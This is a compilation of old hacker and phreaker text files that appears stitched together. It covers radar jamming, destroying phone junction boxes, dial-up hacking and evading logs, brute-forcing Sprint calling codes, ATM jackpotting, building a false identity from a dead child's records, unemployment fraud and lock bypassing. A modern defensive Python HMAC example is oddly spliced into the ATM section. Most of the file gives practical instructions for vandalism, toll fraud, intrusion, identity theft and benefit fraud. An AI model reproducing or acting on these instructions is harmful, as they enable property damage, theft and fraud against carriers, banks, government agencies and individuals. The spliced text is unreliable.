Ps: Opera allows for on-the-fly switching of User Agents through its "Browser Identification" function, while for Mozilla/FireFox browsers a switching utility is available as an installable extension from this url: help://chrispederick.myacen.com/work/firefox/useragentswitcher/download/

telnet 25

Network Solutions shut down that nifty telnet thing on whois.internic.net on the default telnet port (25), despite many protests. However, there is something fun you can do with telnet with whois.internic.net or any other cooperating domain name server. At your DOS prompt in Windows (search for command.com or cmd.exe to run a DOS prompt) or terminal prompt (shell) in Linux or Unix, type:

telnet whois.internic.net 43

It gives a blank page. Type in the domain name you want to check and hit enter. Voila! You get something like this:

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information.

   Domain Name: TECHBROKER.COM
   Registrar: NETWORK SOLUTIONS, INC.
   Whois Server: whois.networksolutions.com
   Referral URL: http://www.networksolutions.com
   Name Server: DNS1.WURLD.NET
   Name Server: DNS2.WURLD.NET
   Status: ACTIVE
   Updated Date: 11-dec-2002
   Creation Date: 13-feb-1996
   Expiration Date: 14-feb-2006

>>> Last update of whois database: Fri, 14 Nov 2003 07:28:09 EST <<<

NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration.

Highway radar jamming

Most drivers wanting to make better time on the open road will invest in one of those expensive radar detectors. However, this device will not work against a gun type radar unit in which the radar signal is not present until the cop has your car in his sights and pulls the trigger. Then it is TOO LATE for you to slow down. A better method is to continuously jam any signal with a radar signal of your own. I have tested this idea with the cooperation of a local cop and found that his unit reads random numbers when my car approached him. It is surprisingly easy to make a low power radar transmitter. A nifty little semiconductor called a Gunn Diode will generate microwaves when supplied with 5 to 10 volts DC and enclosed in the correct size cavity (resonator). An 8 to 3 terminal regulator can be used to get this voltage from a car's 12v system. However, the correct construction and tuning of the cavity is difficult without good microwave measurement equipment. Police radars commonly operate on the K band at 22 GHz, or more often on the X band at 10.525 GHz. Most microwave intruder alarms and motion detectors (mounted over automatic doors in supermarkets & banks, etc.) contain a Gunn type transmitter/receiver combination that transmits about 10 kilowatts at 10.525 GHz. These units work perfectly as jammers. If you cannot get one locally, write to Microwave Associates in Burlington, Massachusetts and ask them for info on 'Gunnplexers' for ham radio use. When you get the unit it may be mounted in a plastic box on the dash or in a weather-proof enclosure behind the PLASTIC grille. Switch on the power when on an open highway. The unit will not jam radar to the side or behind the car so don't go speeding past the radar trap. An interesting phenomenon you will notice is that the drivers who are in front of you who are using detectors will hit their brakes as you approach large metal signs and bridges. Your signal is bouncing off of these objects and triggering their radar detectors!

HAVE FUN!

P.S. If you are interested in this sort of thing, get a copy of POPULAR COMMUNICATIONS. The ads in there tell you where you can get all kinds of info on all kinds of neat equipment for all kinds of neat things!

Phone related vandalism

If you live where there are underground lines then you will be able to ruin someone's phone life very easily. All you must do is go to their house and find the green junction box that interfaces their line (and possibly some others in the neighborhood) with the major lines. These can be found just about anywhere but they are usually underneath the nearest phone pole. Take a socket wrench and loosen the nut on the right. Then just take clippers or a sledge hammer or a bomb and destroy the insides and pull up their phone cable. Now cut it into segments so it can't be fixed but must be replaced (There is a week's worth of work for 'em!!) Another place to phuck with lines is in new developments. When houses/apartments/condos are still in the plywood and dirt stage, the lines are run into junxion boxes. When the crew goes home for the day, plan your attack. Just destroy the shit out of the box, then replace the cover. Watch em' go nuts as they try to figure out where the line broke in the walls <DUH!> !

Hacking Tutorial

What is hacking?
----------------
According to popular belief the term hacker and hacking was founded at MIT. It comes from the root of a hack writer, someone who keeps "hacking" at the typewriter until he finishes the story. A computer hacker would be hacking at the keyboard or password works.

What you need:
--------------
To hack you need a computer equipped with a modem (a device that lets you transmit data over phone lines) which should cost you from $100 to $1200.

How do you hack?
----------------
Hacking requires two things:
1. The phone number
2. Answer to identity elements

How do you find the phone #?
----------------------------
There are three basic ways to find a computer's phone number.
1. Scanning
2. Directory
3. Inside info

What is scanning?
-----------------
Scanning is the process of having a computer search for a carrier tone. For example, the computer would start at (800) 111-1111 and wait for carrier; if there is none it will go on to 111-1112 etc. If there is a carrier it will record it for future use and continue looking for more.

What is directory assistance?
-----------------------------
This way can only be used if you know where your target computer is. For this example say it is in Menlo Park, CA and the company name is SRI.
1. Dial 411 (or 415-555-1212)
2. Say "Menlo Park"
3. Say "SRI"
4. Write down number
5. Ask if there are any more numbers
6. If so write them down.
7. Hang up on operator
8. Dial all numbers you were given
9. Listen for carrier tone
10. If you hear carrier tone write down number, call it on your modem and you're set to hack!

The Basics of Hacking II

Basics to know before doing anything, essential to your continuing career as one of the elite in the country... This article, "the introduction to the world of hacking" is meant to help you by telling you how not to get caught, what not to do on a computer system, what type of equipment should I know about now, and just a little on the history, past present future, of the hacker. Welcome to the world of hacking! We, the people who live outside of the normal rules, and have been scorned and even arrested by those from the 'civilized world', are becoming scarcer every day. This is due to the greater fear of what a good hacker (skill wise, no moral judgements here) can do nowadays, thus causing anti-hacker sentiment in the masses. Also, few hackers seem to actually know about the computer systems they hack, or what equipment they will run into on the front end, or what they could do wrong on a system to alert the 'higher' authorities who monitor the system. This article is intended to tell you about some things not to do, even before you get on the system. I will tell you about the new wave of front end security devices that are beginning to be used on computers.

I will attempt to instill in you a second identity, to be brought up at time of great need, to pull you out of trouble. And, by the way, I take no, repeat, no, responsibility for what we say in this and the forthcoming articles. Enough of the bullshit, on to the fun: after logging on your favorite BBS, you see on the high access board a phone number! It says it's a great system to "fuck around with!" This may be true, but how many other people are going to call the same number? So: try to avoid calling a number given to the public. This is because there are at least every other user calling, and how many other boards will that number spread to? If you call a number far, far away, and you plan on going thru an extender or a re-seller, don't keep calling the same access number (I.E. as you would if you had a hacker running), this looks very suspicious and can make life miserable when the phone bill comes in the mail. Most cities have a variety of access numbers and services, so use as many as you can. Never trust a change in the system... The 414's, the assholes, were caught for this reason: when one of them connected to the system, there was nothing good there. The next time, there was a trek game stuck right in their way! They proceeded to play said game for two, say two and a half hours, while telenet was tracing them! Nice job, don't you think? If anything looks suspicious, drop the line immediately!! As in, yesterday!! The point we're trying to get across is: if you use a little common sense, you won't get busted. Let the little kids who aren't smart enough to recognize a trap get busted, it will take the heat off of the real hackers. Now, let's say you get on a computer system... It looks great, checks out, everything seems fine. Ok, now is when it gets more dangerous. You have to know the computer system to know what not to do. Basically, keep away from any command something, copy a new file into the account, or whatever!

Always leave the account in the same status you logged in with. Change *nothing*... If it isn't an account with priv's, then don't try any commands that require them! All, yes all, systems are going to be keeping log files of what users are doing, and that will show up. It is just like dropping a trouble-card in an ESS system, after sending that nice operator a pretty tone. Spend no excessive amounts of time on the account in one stretch. Keep your calling to the very late night if possible, or during business hours (believe it or not!). It so happens that there are more users on during business hours, and it is very difficult to read a log file with 60 users doing many commands every minute. Try to avoid systems where everyone knows each other, don't try to bluff. And above all: never act like you own the system, or are the best there is. They always grab the people whose heads swell... There is some very interesting front end equipment around nowadays, but first let's define terms... By front end, we mean any device that you must pass thru to get at the real computer. There are devices that are made to defeat hacker programs, and just plain old multiplexers. To defeat hacker programs, there are now devices that pick up the phone and just sit there... This means that your device gets no carrier, thus you think there isn't a computer on the other end. The only way around it is to detect when it was picked up. If it picks up after the same number of rings, then you know it is a hacker-defeater. These devices take a multi-digit code to let you into the system. Some are, in fact, quite sophisticated to the point where it will also limit the user name's down, so only one name or set of names can be valid logins after they input the code... Other devices input a number code, and then they dial back a pre-programmed number for that code. These systems are best to leave alone, because they know someone is playing with their phone. You may think "but I'll just reprogram the dial-back." Think again, how stupid that is... Then they have your number, or a test loop if you were just a little smarter. If it's your number, they have your balls (if male...), if it's a loop, then you are screwed again, since those loops are *monitored*. As for multiplexers... What a plexer is supposed to do is this: The system can accept multiple users. We have to time share, so we'll let the front-end processor do it... Well, this is what a multiplexer does. Usually they will ask for something like "enter class" or "line:".
Usually it is programmed for a double digit number, or a four to five letter word. There are usually a few sets of numbers it accepts, but those numbers also set your 300/1200/2400 baud data type. These multiplexers are inconvenient at best, so not to worry. A little about the history of hacking: hacking, by my definition, means a great knowledge of some special area. Doctors and lawyers are hackers of a sort, by this definition. But most often, it is Mail:mtahirzahid@yahoo.com
being used in the computer context, and thus we have a definition of "anyone who has a great amount of computer or telecommunications knowledge." You are not a hacker because you have a list of codes... Hacking, by my definition, has then been around only about 15 years. It started, where else but, MIT and colleges where they had computer science or electrical engineering departments. Hackers have created some of the best computer languages, the most awesome operating systems, and even gone on to make millions. Hacking used to have a good name, when we could honestly say "we know what we are doing". Now it means (in the public eye): the 414's, Ron Austin, the NASA hackers, the ARPANET hackers... All the people who have been caught, have done damage, and are now going to have to face fines and sentences. Thus we come past the moralistic crap, and to our purpose: educate the hacker community, return to the days when people actually knew something...

##########################################################################
#                                                                        #
#                          The Remote Informer                           #
#                                                                        #
#------------------------------------------------------------------------#
#            Reader supported newsletter for the underworld              #
#------------------------------------------------------------------------#
#                                                                        #
#                  Editors: Tracker and Norman Bates                     #
#                                                                        #
#========================================================================#
#  September 1987                                            Issue: 01   #
#========================================================================#
#                            The Headlines                               #
#------------------------------------------------------------------------#
#  1) Introduction                                                       #
#  2) Hacking Sprint: The Easy Way                                       #
#  3) Rumors: Why spread them?                                           #
#  4) The New Sprint FON Calling Cards                                   #
#  5) Automatic Number Identifier (ANI)                                  #
##########################################################################

Introduction
--------------------------------------------------------------------------
Welcome to the first issue of 'The Remote Informer'! This newsletter is reader supported. If the readers of this newsletter do not help support it, then it will end. We are putting this out to help out the ones that would like to read it. If you are one of those who thinks they know everything, then don't bother reading it. This newsletter is not anything like the future issues. The future issues will contain several sections, as long as reader input is obtained. Below is an outline overview of the sections in the future issues.

I/O Board (Input/Output Board)

The I/O Board is for questions you have, that we might be able to answer or at least refer you to someone or something. We will be honest if we cannot help you. We will not make up something, or to the effect, just to make it look like we answered you. There will be a section in the I/O Board for questions we cannot answer, and then the readers will have the opportunity to answer it. We will print anything that is reasonable in the newsletter, even complaints if you feel like you are better than everyone.

NewsCenter

This section will be for news around the underworld. It will talk of busts of people in the underworld and anything else that would be considered news. If you find articles in the paper, or something happens in your local area, type it up, and upload it to one of the boards listed at the end of the newsletter. Your handle will be placed in the article. If you do enter a news article, please state the date and from where you got it.

Feature Section

The Feature Section will be the largest of the sections as it will be
on the topic that is featured in that issue. This will be largely reader input which will be sent in between issues. At the end of the issue at hand, it will tell the topic of the next issue, therefore, if you have something to contribute, then you will have ample time to prepare your article.

Hardware/Software Review

In this section, we will review the good and bad points of hardware and software related to the underworld. It will be an extensive review, rather than just a small paragraph.

The Tops

This section will be the area where the top underworld BBS's, hacking programs, modem scanners, etc. will be shown. This will be reader selected and will not be altered in any way. The topics are listed below.

  Underworld BBS's (Hack, Phreak, Card, Anarchy, etc.)
  Hacking programs for Hayes compatibles
  Hacking programs for 1030/Xm301 modems
  Modem scanners for Hayes compatibles
  Modem scanners for 1030/Xm301 modems
  Other type illegal programs

You may add topics to the list if enough will support it.

Tid Bits

This will contain tips and helpful information sent in by the users. If you have any information you wish to contribute, then put it in a text file and upload it to one of the BBS's listed at the end of the newsletter. Please, no long distance codes, mainframe passwords, etc.

We may add other sections as time goes by. This newsletter will not be put out on a regular basis. It will be put out when we have enough articles and information to put in it. There may be up to 5 a month, but there will always be at least one a month. We would like you, the readers, to send us anything you feel would be of interest to others, like hacking hints, methods of hacking long distance companies, companies to card from,
etc. We will maintain the newsletter as long as the readers support it. That is the end of the introduction, but take a look at this newsletter, as it does contain information that may be of value to you.

==========================================================================
Hacking Sprint: The Easy Way
--------------------------------------------------------------------------
By: Tracker

If you hack US Sprint, 950-0777 (by the way it is no longer GTE Sprint), and you are frustrated at hacking several hours only to find one or two codes, then follow these tips, and it will increase your results tremendously.

First, one thing that Mr. Mojo proved is that Sprint will not store more than one code in every hundred numbers. (ex: 98765400 to 98765499 may contain only one code). There may NOT be a code in that hundred, but there will never be more than one. Sprint's 9 digit codes are stored from 500000000 through 999999999. In the beginning of Sprint's 950 port, they only had 8 digit codes. Then they started converting to 9 digit codes, storing all 8 digit codes between 10000000 and 49999999 and all 9 digit codes between 500000000 and 999999999. Sprint has since cancelled most 8 digit codes, although there are a few left that have been denoted as test codes. Occasionally, I hear of phreaks saying they have 8 digit codes, but when verifying them, the codes were invalid.

Now, where do you start? You have already narrowed the low and high numbers in half, therefore already increasing your chances of good results by 50 percent. The next step is to find a good prefix to hack. By the way, a prefix, in hacking terms, is the first digits in a code that can be any length except the same number of digits the code is. (ex: 123456789 is a code. That means 1, 12, 123, 1234, 12345, 123456, 1234567, and 12345678 are prefixes) The way you find a good prefix to hack is to manually enter a code prefix. If when you enter the code prefix and a valid destination number and you do not hear the ringing of the recording telling you that the code is invalid until near the end of the number, then you know the prefix is valid. Here is a chart to follow when doing this:

  Code      - Destination        Range good codes exist
  -------------------------------------------------------
  123456789 - 6192R              123400000 - 123499999
  123456789 - 619267R            123450000 - 123459999
  123456789 - 61926702R          123456000 - 123456999
  123456789 - 6192670293R        123456700 - 123456799
  -------------------------------------------------------
  ( R - Denotes when ring for recording starts)

To prove this true, I ran a test using OmniHack 1.3p, written by Jolly Joe. In this test I found a prefix where the last 3 digits were all I had to hack. I tested each hundred of the 6 digit prefix finding that all but 4 had the ring start after the fourth digit was dialed in the destination number. The other four did not ring until I had finished the entire code. I set OmniHack to hack the prefix + 00 until prefix + 99. (ex: xxxxxxy00 to xxxxxxy99: where y is one of the four numbers that the ring did not start until the dialing was completed.) Using this method, I found four codes in a total of 241 attempts using ascending hacking (AKA: Sequential). Below you will see a record of my hack:

  Range of hack            Codes found    Tries
  ---------------------------------------------
  xxxxxx300 - xxxxxx399    xxxxxx350      50
  xxxxxx500 - xxxxxx599    xxxxxx568      68
  xxxxxx600 - xxxxxx699    xxxxxx646      46
  xxxxxx800 - xxxxxx899    xxxxxx877      77
  ---------------------------------------------
  Totals                   4 codes        241
As you see, these methods work. Follow these guidelines and tips and you should have an increase in production of codes in the future hacking Sprint. Also, if you have any hints/tips you think others could benefit from, then type them up and upload them to one of the boards at the end of the newsletter.

==========================================================================
Rumors: Why Spread Them?
--------------------------------------------------------------------------
Do you ever get tired of hearing rumors? You know, someone gets an urge to impress others, so they create a rumor that some long distance
company is now using tracing equipment. Why start rumors? It only scares others out of phreaking, and then makes you, the person who started the rumor, look like Mr. Big. This article is short, but it should make you aware of the rumors that people spread for personal gain. The best thing to do is to denote them as a rumor starter and then leave it at that. You should not rag on them constantly, since if the other users cannot determine if it is fact or rumor, then they should suffer the consequences.

==========================================================================
The New Sprint FON Calling Cards
--------------------------------------------------------------------------
By: Tracker

US Sprint has opened up a new long distance network called the Fiber Optic Network (FON), in which subscribers are given calling cards. These calling cards are 14 digits, and though they seem randomly generated, they are actually encrypted. The rumors floating around about people getting caught using the Sprint FON calling cards are fact, not rumors. The reason people are getting caught is that they confuse the FON calling cards with the local 950 port authorization codes. If you will remember, you never use AT&T calling cards from your home phone. It has ANI capability, which is not tracing, but rather the originating phone number is placed on the bill as soon as the call is completed. They know your phone number when you call the 800 access port, but they do not record it until your call is completed. Also, through several of my hacks, I came up with some interesting information surrounding the new Sprint network. They are listed below.

800-877-0000 - This number is for information on US Sprint's 800 calling card service. I have not played around with it, but I believe it is for trouble or help with the FON calling cards. I am not sure if it is for subscribing to the FON network.
800-877-0002 - You hear a short tone, then nothing.
800-877-0003 - US Sprint Alpha Test Channel #1
800-877-(0004-0999) - When you call these numbers, you get a recording saying: "Welcome to US Sprint's 1 plus service." When the recording stops, if you hit the
pound key (#) you will get the calling card dial tone.

Other related Sprint numbers

800-521-4949 - This is the number that you subscribe to US Sprint with. You may also subscribe to the FON network on this number. It will take 4 to 5 weeks for your calling card to arrive.
10777 - This is US Sprint's equal access number. When you dial this number, you then dial the number you are calling, and it will be billed through US Sprint, and you will receive their long distance line for that call. Note that you will be billed for calls made through equal access. Do not mistake it to be a method of phreaking, unless used from a remote location. If you are in US Sprint's 1+ service then call 1+700-555-1414, which will tell you which long distance company you are using. When you hear: "Thank you for choosing US Sprint's 1 plus service," hit the pound key (#), and then you will get the US Sprint dial tone. This however is just the same as if you are calling from your home phone if you dial direct, so you would be billed for calls made through that, but there are ways to use this to your advantage as in using equal access through a PBX.

==========================================================================
Automatic Number Identification (ANI)
--------------------------------------------------------------------------

The true definition for Automatic Number Identification has not been widely known to many. Automatic Number Identification, (AKA: ANI), is the process of the destination number knowing the originating number, which is where you are calling from. The method of achieving this is to send the phone number that you are calling from in coded form ahead of the destination number. Below is an example of this.

  ANI Method
  Dial: 267-0293
  Sent: ********2670293
  ( * - Denotes the originating number which is coded and sent before the number )

As you noticed there are 8 digits in the coded number. This is
because, at least I believe, it is stored in a binary-like form. Automatic Number Identification means a limited future in phreaking. ANI does not threaten phreaking very much yet, but it will in the near future. A new switching system will soon be installed in most cities that are covered by ESS, Electronic Switching System, now. The system will have ANI capabilities which will be supplied to the owners of phone lines as an added extra. The owner's phone will have an LED read-out that will show the phone number of the people that call you. You will be able to block some numbers, so that people cannot call you. This system is in the testing stages currently, but will soon be installed across most of the country. As you see, this will end a large part of phreaking, until we, the phreakers, can come up with an alternative. As I have been told by several, usually reliable, people, this system is called ISS, which I am not sure of the meaning of this, and is being tested currently in Rhode Island. 800 in-watts lines set up by AT&T support ANI. The equipment to decode an ANI coded origination number does not cost as much as you would expect. 950 ports do not offer ANI capability, no matter what you have been told. The 950 ports will only give the city in which they are based, this usually being the largest in the state, sometimes the capital. One last thing that I should tell you is that ANI is not related to tracing. Tracing can be done on any number whether local, 950, etc. One way around this, especially when dialing Alliance TeleConferencing, is to dial through several extenders or ports. ANI will only cover the number that is calling it, and if you call through a number that does not support ANI, then your number will never be known.

==========================================================================
The Disclaimer!
--------------------------------------------------------------------------
We, the editors, take no responsibility for your actions and use of the information in this newsletter. This newsletter is for informational purposes only. There will never be any long distance codes, passwords, etc. in this newsletter. If you are easily offended by telecommunication discussions, then we suggest that you not read this newsletter. But for those who are truly interested in the information in this newsletter,
enjoy it.

Jackpotting ATM Machines

JACKPOTTING was done rather successfully a while back in (you guessed it) New York. What the culprits did was:

  Sever (actually cross over) the line between the ATM and the host.
  Insert a microcomputer between the ATM and the host.
  Insert a fraudulent card into the ATM. (card=cash card, not hardware)

What the ATM did was: send a signal to the host, saying "Hey! Can I give this guy money, or is he broke, or is his card invalid?"

What the microcomputer did was: intercept the signal from the host, discard it, send "there's no one using the ATM" signal.

What the host did was: get the "no one using" signal, send back "okay, then for God's sake don't spit out any money!" signal to ATM.

What the microcomputer did was: intercept signal (again), throw it away (again), send "Wow! That guy is like TOO rich! Give him as much money as he wants. In fact, he's so loaded, give him ALL the cash we have! He is really a valued customer." signal.

What the ATM did: what else? Obediently dispense cash till the cows came home (or very nearly so).

What the crooks got: well in excess of $120,000 (for one weekend's work), and several years when they were caught.

This story was used at a CRYPTOGRAPHY conference I attended a while ago to demonstrate the need for better information security. The lines between ATM's & their hosts are usually 'weak' in the sense that the information transmitted on them is generally not encrypted in any way. One of the ways that JACKPOTTING can be defeated is to encrypt the information passing between the ATM and the host. As long as the key cannot be determined from the ciphertext, the transmission (and hence the transaction) is secure. A more believable, technically accurate story might concern a person who uses a computer between the ATM and the host to determine the key before actually fooling the host. As everyone knows, people find cryptanalysis a very exciting and engrossing subject...don't they?
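The story above is the textbook case for why an ATM-to-host link needs more than secrecy: the micro in the middle never reads the traffic, it replaces whole messages, and encryption alone does not stop a substituted or replayed message from being accepted. What stops it is message authentication plus a freshness check. The script below is an added example, not code from the newsletter or from any bank's actual protocol. It assumes the ATM and host share a key (a constructed literal here; real terminals keep it in tamper-resistant hardware), tags every message with an HMAC-SHA256 over the message and a per-session sequence number, and shows that the micro's forged "give him all the cash" reply, a replayed genuine approval, and an edited amount are all dropped before any dispensing logic runs. The field names, the JSON framing and the `|` separator are assumptions made for the demonstration.

```python
import hashlib
import hmac
import json

# Shared ATM/host key. Constructed for this example only; a real deployment
# provisions a per-terminal key in tamper-resistant hardware, never a literal.
KEY = b"constructed-demo-key-do-not-use"


def seal(msg: dict, seq: int, key: bytes = KEY) -> bytes:
    """Serialize msg together with its sequence number and append an
    HMAC-SHA256 tag, so the receiver can detect forgery, tampering and replay."""
    body = json.dumps({"seq": seq, **msg}, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return body + b"|" + tag


def open_sealed(wire: bytes, expected_seq: int, key: bytes = KEY):
    """Return the message dict if the tag verifies and the sequence number is
    the one this side expects next; otherwise None (the receiver drops it)."""
    try:
        body, tag = wire.rsplit(b"|", 1)
    except ValueError:
        return None                                  # malformed frame
    good = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(good, tag):           # constant-time compare
        return None                                  # forged or tampered
    msg = json.loads(body)
    if msg.get("seq") != expected_seq:               # stale or replayed
        return None
    return msg


def run_scenario() -> dict:
    """Re-run the jackpotting exchange with a man in the middle and report
    which of his messages the authenticated link lets through."""
    # 1. Genuine exchange: ATM asks, host answers. Each side tracks the
    #    sequence number it expects next.
    request = seal({"type": "auth_request", "card": "constructed-card-id",
                    "amount": 200}, seq=1)
    host_view = open_sealed(request, expected_seq=1)

    reply = seal({"type": "auth_reply", "approved": True, "amount": 200}, seq=2)
    atm_view = open_sealed(reply, expected_seq=2)

    # 2. Forgery: the micro fabricates "give him all the cash" but holds no
    #    key, so the best it can do is attach a made-up tag.
    forged_body = json.dumps({"seq": 2, "type": "auth_reply", "approved": True,
                              "amount": 120000}, sort_keys=True).encode()
    forged = forged_body + b"|" + b"0" * 64
    forged_view = open_sealed(forged, expected_seq=2)

    # 3. Replay: the micro records a real approval and plays it back during
    #    a later transaction, when the ATM expects sequence number 4.
    replay_view = open_sealed(reply, expected_seq=4)

    # 4. Tampering: the micro edits one field of a genuine message in
    #    transit without being able to recompute the tag.
    tampered = reply.replace(b'"amount": 200', b'"amount": 999')
    tampered_view = open_sealed(tampered, expected_seq=2)

    return {
        "host_saw_request": host_view is not None
                            and host_view["type"] == "auth_request",
        "atm_approved_amount": atm_view["amount"],
        "forged_rejected": forged_view is None,
        "replay_rejected": replay_view is None,
        "tamper_rejected": tampered_view is None,
    }


if __name__ == "__main__":
    print(run_scenario())
```

Run it directly to print the outcome dictionary. The sequence number is what defeats replay; the tag is what defeats substitution, and the two together are what "encrypt the line" is usually shorthand for in this context. The check is only as strong as the key's protection, which is exactly the weak point the next story on the page (a dial-up maintenance line straight into the host) exploits from the other side.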
(Hee-Hee)

   _____      _______      ______
  |     |-<<-|       |-<<-|      |
  | ATM |    | micro |    | Host |
  |_____|->>-|_______|->>-|______|

The B of A ATM's are connected through dedicated lines to a host computer as the Bishop said. However, for maintenance purposes, there is at least one separate dial-up line also going to that same host computer. This guy basically bs'ed his way over the phone till he found someone stupid enough to give him the number. After finding that, he had his Apple hack at the code. Simple.

Step 2: He had a friend go to an ATM with any B of A ATM card. He stayed at home with the Apple connected to the host. When his friend inserted the card, the host displayed it. The guy with the Apple modified the status & number of the card directly in the host's memory. He turned the card into a security card, used for testing purposes. At that point, the ATM did whatever its operator told it to do. The next day, he went into the bank with the $2000 he received, talked to the manager and told him every detail of what he'd done. The manager gave him his business card and told him that he had a job waiting for him when he got out of school. Now, B of A has been warned, they might have changed the system. On the other hand, it'd be awful expensive to do that over the whole country when only a handful of people have the resources and even less have the intelligence to duplicate the feat. Who knows?

How To Create A New Identity

You might be saying, "Hey Glitch, what do I need a new identity for?" The answer is simple. You might want to go buy liquor somewhere, right? You might want to go give the cops the false name when you get busted so you keep your good name, eh? You might even want to use the new identity for getting a P.O. Box for carding. Sure! You might even want the stuff for renting yourself a VCR at some dickless loser of a convenience store. Here we go:
Getting a new ID isn't always easy, no one said it would be. By following these steps, any bozo can become a new bozo in a coupla weeks.

STEP 1

The first step is to find out who exactly you'll become. The most secure way is to use someone's ID who doesn't use it themselves. The people who fit that bill the best are dead. As an added bonus they don't go complaining one bit. Go to the library and look through old death notices. You have to find someone who was born about the same time as you were, or better yet, a year or two older so you can buy booze, etc. You should go back as far as you can for the death because most states now cross index deaths to births so people can't do this in the future. The cutoff date in Wisconsin is 1979, folks in this grand state gotta look in 1978 or earlier. Anything earlier there is cool. Now, this is the hardest part if you're younger. Brats that young happen to be quite resilient, takin' falls out of three story windows and eating rat poison like it's Easter candy, and not a scratch or dent. There ain't many that die, so ya gotta look your ass off. Go down to the library and look up all the death notices you can, if it's on microfilm so much the better. You might have to go through months of death notices though, but the results are well worth it. You gotta get someone who died locally in most instances: the death certificate is filed only in the county of death. Now you go down to the county courthouse in the county where he died and get the death certificate, this will cost you around $3-$5 depending on the state you're in. Look at this hunk of paper, it could be your way to vanish in a cloud of smoke when the right time comes, like right after that big scam. If you're lucky, the slob's parents signed him up with social security when he was a snot nosed brat. That'll be another piece of ID you can get. If not, that's ok too. It'll be listed on the death certificate if he has one. If you're lucky, the stiff was born locally and you can get his birth certificate right away.

STEP 2

Now check the place of birth on the death certificate, if it's in
the same place you're standing now, you're all set. If not, you can mail away for one from that county but it's a minor pain and it might take a while to get, the librarian at the desk has listings of where to write for this stuff and exactly how much it costs. Get the birth certificate, it's worth the extra money to get it certified because that's the only way some people will accept it for ID. When you're gettin' this stuff the little forms ask for the reason you want it, instead of writing in "Fuck you", try putting in the word "Genealogy". They get this all the time. If the death certificate looks good for you, wait a day or so before getting the certified birth certificate in case they recognize someone wanting it for a dead guy.

STEP 3

Now you're cookin'! You got your start and the next part's easy. Crank out your old dot matrix printer and run off some mailing labels addressed to you at some phony address. Take the time to check your phony address that there is such a place. Hotels that rent by the month or large apartment buildings are good, be sure to get the right zip code for the area. These are things that the cops might notice that will trip you up. Grab some old junk mail and paste your new labels on them. Now take them along with the birth certificate down to the library. Get a new library card. If they ask you if you had one before say that you really aren't sure because your family moved around a lot when you were a kid. Most libraries will allow you to use letters as a form of ID when you get your card. If they want more give them a sob story about how you were mugged and got your wallet stolen with all your identification. Your card should be waiting for you in about two weeks. Most libraries ask for two forms of ID, one can be your trusty birth certificate, and they do allow letters addressed to you as a second form.

STEP 4

Now you got a start, it isn't perfect yet, so let's continue. You should have two forms of ID now. Throw away the old letters, or better yet stuff them inside the wallet you intend to use with this stuff.
Go to the county courthouse and show them what nice ID you got and get a state ID card. Now you got a picture ID. This will take about two weeks and cost about $5, it's well worth it.

STEP 5

If the death certificate had a social security number on it you can go out and buy one of those metal SS# cards that they sell. If it didn't, then you got all kinds of pretty ID that shows exactly who you are. If you don't yet have an SS#, go down and apply for one, these are free but they could take five or six weeks to get, bureaucrats you know... You can invent a SS# too if ya like, but the motto of 'THE WALKING GLITCH' has always been "Why not excellence?".

STEP 6

If you want to go whole hog you can now get a bank account in your new name. If you plan to do a lot of traveling then you can put a lot of money in the account and then say you lost the account book. After you get the new book you take out all the cash. They'll hit you with a slight charge and maybe tie-up your money some, but if you're ever broke in some small town that bank book will keep you from being thrown in jail as a vagrant.

ALL DONE?

So kiddies, you got ID for buying booze, but what else? In some towns (the larger the more likely) the cops if they catch you for something petty like shoplifting stuff under a certain dollar amount, will just give you a ticket, same thing for pissing in the street. That's it! No fingerprints or nothing, just pay the fine (almost always over $100) or appear in court. Of course they run a radio check on your ID, you'll be clean and your alter-ego gets a blot on his record. You're free and clear. That's worth the price of the trouble you've gone through right there. If you're smart, you'll toss that ID away if this happens, or better yet, tear off your picture and give the ID to someone you don't like, maybe they'll get busted with it.
If you're a working stiff, here's a way to stretch your dollar. Go to work for as long as it takes to get unemployment and then get yourself fired. Go to work under the other name while you're getting the unemployment. With a couple of sets of ID, you can live like a king. These concepts for survival in the new age come to you compliments of THE WALKING GLITCH. First release of this phile 7/7/88.

Lockpicking for the EXTREME beginner...

This is really a good method for opening doors that are locked. The only problem with this, though, is that it only works for outward opening doors. Ok, here we go....

1) Realize you are not working with the actual lock, but that thing that sticks between the door and the wall.
2) See how that thing is curved on one side? Well, that is what we will be making use of.
3) Acquire a large paper-clip. If it is too short, it won't work. You have to also have a shoelace. Now, onto the construction...
4) Straighten the paper-clip.
5) Loop one end of the paper clip around the shoelace. The shoelace should be about 4/5 on one side of the clip and 1/5 on the other. Let's see if I can draw it.

   ------------------*************************************
                    -*
                     *******

   --- is the paper clip
   *** is the shoelace

That's not very good, but I hope you get the picture.
6) All you have to do now is curve the paper clip (no, I won't draw it)
7) With the curved paper-clip, stick it between the door and the wall, behind the metal thing that sticks between.
8) Feed it through with your hand, until you can grip both sides of the shoelace.
9) Now, simply pull the lace and the door at the same time, and VOILA! the door is open.

I prefer this over regular lock-picking if the door opens outward, because it is a lot quicker. Lock picking can take 5 minutes... When done correctly this only takes 30 seconds! So, if you can, use this.

OPENING COMBO LOCKS

First of all, let me tell you about the set-up of a lock. When the lock is locked, there is a curved piece of metal wedged inside the little notch on the horseshoe shaped bar (known as the shackle) that is pushed in to the lock when you lock it. To free this wedge, you usually have to turn the lock to the desired combination and the pressure on the wedge is released therefore letting the lock open. I will now tell you how to make a pick so you can open a lock without having to waste all that time turning the combination (this also helps when you don't know the combination to begin with). To bypass this hassle, simply take a thinned hairpin (file it down) or an opened-out piece of a collapsing antenna (the inside diameter of the curved piece of metal should be the same as the diameter of the shackle; if the metal is too thick, use fine sandpaper to thin it down). Once you have your hairpin (make sure it's metal), take the ridged side and break it off right before it starts to make a U-turn onto the straight
